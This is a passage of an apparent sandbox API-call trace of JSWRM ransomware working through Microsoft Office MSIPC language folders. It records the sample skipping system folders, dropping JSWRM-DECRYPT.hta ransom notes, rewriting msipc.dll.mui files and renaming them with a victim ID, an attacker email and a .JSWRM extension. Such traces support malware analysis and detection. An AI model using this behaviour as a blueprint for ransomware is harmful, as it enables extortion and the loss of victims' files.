lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.487] CloseHandle (hObject=0x238) returned 1 [0136.487] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\it\\jswrm-decrypt.hta")) returned 0x20 [0136.487] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48027652, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231d00 [0136.487] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.487] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48027652, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.488] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.488] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.488] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48027652, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48027652, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48027652, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.488] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.488] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.488] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.488] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.488] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.488] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.488] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.488] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.489] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.489] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.489] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.489] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.489] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.489] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.489] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\it\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.490] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23192) returned 1 [0136.490] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.490] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5a90, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5a90, lpOverlapped=0x0) returned 1 [0136.493] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.493] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5a90, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5a90, lpOverlapped=0x0) returned 1 [0136.493] CloseHandle (hObject=0x314) returned 1 [0136.493] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\it\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\it\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.494] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5c164a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5a98, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.494] FindClose (in: hFindFile=0x231d00 | out: hFindFile=0x231d00) returned 1 [0136.494] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ja", cAlternateFileName="")) returned 1 [0136.494] lstrcmpiW (lpString1="ja", lpString2=".") returned 1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="..") returned 1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="...") returned 1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="windows") returned -1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="recovery") returned -1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="perflogs") returned -1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="documents and settings") returned 1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="$RECYCLE.BIN") returned 1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="system volume information") returned -1 [0136.494] lstrcmpiW (lpString1="ja", lpString2="msocache") returned -1 [0136.494] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ja\\jswrm-decrypt.hta")) returned 0xffffffff [0136.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.495] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.495] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ja\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.496] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.496] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.497] CloseHandle (hObject=0x238) returned 1 [0136.497] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ja\\jswrm-decrypt.hta")) returned 0x20 [0136.497] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4804d8cb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x232040 [0136.497] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.497] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4804d8cb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.497] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.497] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.497] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4804d8cb, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4804d8cb, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4804d8cb, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.497] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.498] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.498] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.498] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.498] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ja\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.499] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=16536) returned 1 [0136.499] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.499] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x4090, lpOverlapped=0x0) returned 1 [0136.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.502] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x4090, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x4090, lpOverlapped=0x0) returned 1 [0136.502] CloseHandle (hObject=0x314) returned 1 [0136.502] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ja\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\ja\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\ja\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.503] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6aef645, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4098, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.503] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0136.503] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47d78c0f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x47d78c0f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x47d78c0f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.503] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.510] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.511] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.511] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6781ff8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6781ff8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x67a8250, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="kk", cAlternateFileName="")) returned 1 [0136.511] lstrcmpiW (lpString1="kk", lpString2=".") returned 1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="..") returned 1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="...") returned 1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="windows") returned -1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="recovery") returned -1 [0136.511] lstrcmpiW (lpString1="kk", lpString2="perflogs") returned -1 [0136.511] lstrcmpiW 